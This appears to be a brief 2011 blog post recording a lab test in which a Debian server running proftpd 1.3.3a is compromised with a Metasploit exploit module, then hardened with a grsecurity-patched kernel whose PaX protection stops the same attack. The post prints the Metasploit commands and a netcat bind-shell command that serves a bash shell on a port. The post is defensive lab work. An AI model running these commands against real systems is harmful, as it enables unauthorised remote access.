Montag, 31. Januar 2011

grsecurity vs proftpd-exploit

Victim: Debian 6.0 with proftpd 1.3.3a
Attacker: Backtrack 4 rc2 - Metasploit 3.6

use exploit/linux/ftp/proftp_telnet_iac
set TARGET 2
set PAYLOAD ...

The Shell-payloads of metapsloit didnt work but i could execute a command
--> nc -l -p 1234 -e /bin/bash
which listens on port 1234 and gives you a bash shell on connect

system got compromised. so now with grsecurity
to patch the latest kernel in this case
Linux debian 2.6.32.28

at compilation i got an error, something with "lguest"
found a workaround (easy) at

i tried again to exploit proftpd and it didnt work.
pax did alarm me and shutdown proftpd


HERE is the VIDEO

Keine Kommentare:

Kommentar veröffentlichen